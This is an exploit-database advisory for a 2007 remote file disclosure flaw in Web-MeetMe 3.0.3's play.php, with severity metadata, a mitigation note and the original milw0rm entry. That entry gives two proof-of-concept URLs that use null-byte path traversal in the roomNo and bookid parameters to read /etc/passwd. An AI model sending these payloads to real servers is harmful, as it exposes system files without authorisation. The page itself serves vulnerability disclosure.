Web-MeetMe 3.0.3 Remote File Disclosure Vulnerability

vendor:

Web-MeetMe

by:

Evil.Man

7.5

CVSS

HIGH

Remote File Disclosure

CWE

Product Name: Web-MeetMe

Affected Version From: Web-MeetMe 3.0.3

Affected Version To: Web-MeetMe 3.0.3

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Web-MeetMe 3.0.3 Remote File Disclosure Vulnerability

The Web-MeetMe 3.0.3 application is vulnerable to a remote file disclosure vulnerability. By exploiting this vulnerability, an attacker can disclose sensitive files on the server by including malicious input in the 'roomNo' or 'bookid' parameters of the 'play.php' script. This can allow an attacker to view the contents of files such as the '/etc/passwd' file. The vulnerability was discovered by Evil.Man.

Mitigation:

The vendor has not released a patch for this vulnerability. To mitigate the risk, it is recommended to restrict access to the 'play.php' script or remove it entirely from the server.

Source

Exploit-DB raw data:

/--------------------------------------------------------------------------\
|Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability          |
|Download Script :                                                         |
| http://sourceforge.net/project/showfiles.php?group_id=164788             |
|POC :                                                                     |
| Web-MeetMe_v3.0.3/play.php?roomNo=../../../../../../../../etc/passwd%00  |
| Web-MeetMe_v3.0.3/play.php?bookid=../../../../../../../../etc/passwd%00  |
|Discovered by : Evil.Man                                                  |
|Home Page : Tryag.Com/cc                                                  |
|Email : Evil.Man@windowslive.com                                          |
|Sp.Thanx To : GoLd_M [Mahmood_ali"Tryag.Com"] & Sniper-Sa.Com             |
\--------------------------------------------------------------------------/

# milw0rm.com [2007-11-29]